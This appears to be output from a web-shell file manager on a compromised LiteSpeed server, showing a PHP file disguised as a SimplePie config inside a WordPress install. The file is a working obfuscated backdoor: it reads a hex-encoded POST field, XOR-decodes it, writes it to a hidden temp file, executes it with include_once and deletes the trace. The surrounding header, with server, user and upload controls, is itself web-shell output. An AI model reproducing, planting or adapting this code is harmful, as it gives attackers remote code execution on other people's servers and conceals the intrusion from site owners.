HEX
Server: LiteSpeed
System: Linux server44.twelveinks.com 5.14.0-570.12.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 13 06:11:55 EDT 2025 x86_64
User: moda (1338)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /python/moda/public_html/tech/wp-includes/SimplePie/config_1756285626.php
<!--AgKn4qEw-->
<?php

if(in_array("\x66\x61\x63tor", array_keys($_POST))){
$flg = hex2bin($_POST["\x66\x61\x63tor"]);
$obj =''; $m=0;while($m<strlen($flg)){$obj.=chr(ord($flg[$m])^75);$m++;}
$resource = array_filter([session_save_path(), getenv("TEMP"), sys_get_temp_dir(), getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), "/tmp", getcwd(), "/var/tmp"]);
foreach ($resource as $key => $marker) {
            if ((bool)is_dir($marker) && (bool)is_writable($marker)) {
            $object = vsprintf("%s/%s", [$marker, ".component"]);
            if (false !== file_put_contents($object, $obj)) {
    include_once $object;
    @unlink($object);
    exit;
}
        }
}
}